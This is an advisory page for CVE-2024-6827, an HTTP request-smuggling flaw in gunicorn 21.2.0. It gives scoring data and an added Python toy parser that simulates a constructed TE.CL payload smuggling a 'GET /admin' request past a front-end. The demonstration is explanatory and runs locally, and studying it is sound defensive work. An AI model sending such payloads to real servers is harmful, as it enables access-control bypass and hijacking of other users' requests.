CVE-2024-6827: HTTP Request Smuggling in benoitc/gunicorn

7.5 CVSS

Description

Gunicorn version 21.2.0 does not validate the value of the Transfer-Encoding header as RFC 7230 (section 3.3.3) requires. When the header carries a value Gunicorn does not recognise, it silently discards the header and falls back to Content-Length to delimit the body, instead of rejecting the request with 400 Bad Request and closing the connection, which is what the RFC mandates whenever Transfer-Encoding is present and chunked is not the final coding. Behind a front-end that honours the Transfer-Encoding and frames the body as chunked, the two parsers split the same bytes differently: Gunicorn stops reading the body at the Content-Length and treats the remaining bytes as the start of the next request on the reused back-end connection. This is the TE.CL request smuggling pattern. Depending on what sits in front of Gunicorn, it can be used for cache poisoning, bypass of front-end access controls, capture of other users' requests, session manipulation, SSRF, XSS via poisoned responses, denial of service, and other integrity and business-logic abuses.
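The following is an added illustration, not Gunicorn's parser and not a proof of concept from the advisory. It is a toy HTTP/1.1 message framer that parses one constructed byte stream under three policies: "fallback" models the behaviour described above (an unrecognised Transfer-Encoding value is dropped and the body is framed by Content-Length), "strict" applies RFC 7230 section 3.3.3, and "proxy" stands in for an assumed front-end that treats any value containing "chunked" as chunked. The Transfer-Encoding value used, the proxy's leniency, and the exact-token matching in the fallback policy are assumptions made for the demonstration, not measured behaviour of any product.

```python
"""
Toy HTTP/1.1 framer: the same bytes framed as one request (proxy),
two requests (Content-Length fallback, the CVE-2024-6827 behaviour)
or rejected (RFC 7230 3.3.3 strict).  Added example, not Gunicorn code.
"""
from typing import Dict, List, Optional, Tuple

CRLF = b"\r\n"


class FramingError(Exception):
    """Body length cannot be determined reliably: RFC 7230 3.3.3 says 400 + close."""


def _split_head(raw: bytes) -> Tuple[bytes, Dict[bytes, bytes], bytes]:
    """Split one header block off the front of raw -> (request_line, headers, rest)."""
    head, sep, rest = raw.partition(CRLF + CRLF)
    if not sep:
        raise FramingError("incomplete header block")
    lines = head.split(CRLF)
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()  # duplicates: last wins (toy)
    return lines[0], headers, rest


def _read_chunked(rest: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body (no trailer support) -> (body, remaining bytes)."""
    body = b""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            _, _, rest = rest.partition(CRLF)  # consume the empty line after the last chunk
            return body, rest
        body += rest[:size]
        rest = rest[size + len(CRLF):]  # skip chunk data and its trailing CRLF


def _read_content_length(rest: bytes, cl: Optional[bytes]) -> Tuple[bytes, bytes]:
    """Frame the body by Content-Length; no header means no body."""
    n = int(cl) if cl is not None else 0
    return rest[:n], rest[n:]


def frame_messages(stream: bytes, policy: str) -> List[Tuple[bytes, bytes]]:
    """Frame every message in stream under the given policy -> [(request_line, body), ...]."""
    messages = []
    rest = stream
    while rest:
        request_line, headers, rest = _split_head(rest)
        te = headers.get(b"transfer-encoding")
        cl = headers.get(b"content-length")
        if te is None:
            body, rest = _read_content_length(rest, cl)
        else:
            codings = [c.strip().lower() for c in te.split(b",")]
            if policy == "strict":
                # RFC 7230 3.3.3: chunked must be the final coding, otherwise the
                # length is unknowable and the server must answer 400 and close.
                if codings[-1] != b"chunked":
                    raise FramingError("Transfer-Encoding present but chunked is not final")
                use_chunked = True
            elif policy == "fallback":
                # Assumed model of the CVE: only the bare token is recognised; any
                # other value is dropped and Content-Length (or no body) is used.
                use_chunked = te.lower() == b"chunked"
            elif policy == "proxy":
                # Assumed lenient front-end: "chunked" anywhere in the list wins.
                use_chunked = b"chunked" in codings
            else:
                raise ValueError(f"unknown policy {policy!r}")
            body, rest = _read_chunked(rest) if use_chunked else _read_content_length(rest, cl)
        messages.append((request_line, body))
    return messages


def strict_rejects(stream: bytes) -> bool:
    """True if the strict policy refuses to frame the stream (i.e. would send 400)."""
    try:
        frame_messages(stream, "strict")
    except FramingError:
        return True
    return False


# Constructed TE.CL payload (not taken from the advisory).  The smuggled request's
# Content-Length: 7 exactly swallows the "\r\n0\r\n\r\n" chunk terminator, so the
# fallback parser sees two clean requests rather than leftover bytes.
SMUGGLED = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: backend\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
)
_SIZE_LINE = b"%x\r\n" % len(SMUGGLED)  # chunk-size line for the single chunk
ATTACK = (
    b"POST / HTTP/1.1\r\n"
    b"Host: frontend\r\n"
    b"Content-Length: " + str(len(_SIZE_LINE)).encode() + b"\r\n"  # covers only the size line
    b"Transfer-Encoding: chunked, identity\r\n"  # invalid per RFC 7230: chunked is not final
    b"\r\n"
    + _SIZE_LINE + SMUGGLED + CRLF + b"0\r\n\r\n"
)

if __name__ == "__main__":
    for policy in ("proxy", "fallback"):
        for line, body in frame_messages(ATTACK, policy):
            print(f"{policy:8s} {line!r} body={body!r}")
    print("strict   rejects:", strict_rejects(ATTACK))
```

Run stand-alone, the proxy policy reports a single POST whose chunked body is the embedded GET /admin request, the fallback policy reports the POST (body: just the chunk-size line) followed by GET /admin as a second, attacker-controlled request, and the strict policy refuses the stream outright. The difference between the first two outcomes is the desynchronisation that TE.CL smuggling exploits; the third is the behaviour the RFC requires.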

Classification

CVE ID: CVE-2024-6827

CVSS Base Severity: HIGH

CVSS Base Score: 7.5

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Problem Types

CWE-444 Inconsistent Interpretation of HTTP Requests

Affected Products

Vendor: benoitc

Product: benoitc/gunicorn

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.05% (estimated probability that the vulnerability is exploited in the wild within the next 30 days)

EPSS Percentile: 10.92% (share of all scored vulnerabilities whose EPSS score is less than or equal to this one)

EPSS Date: 2025-04-05 (date on which the score was calculated)

Timeline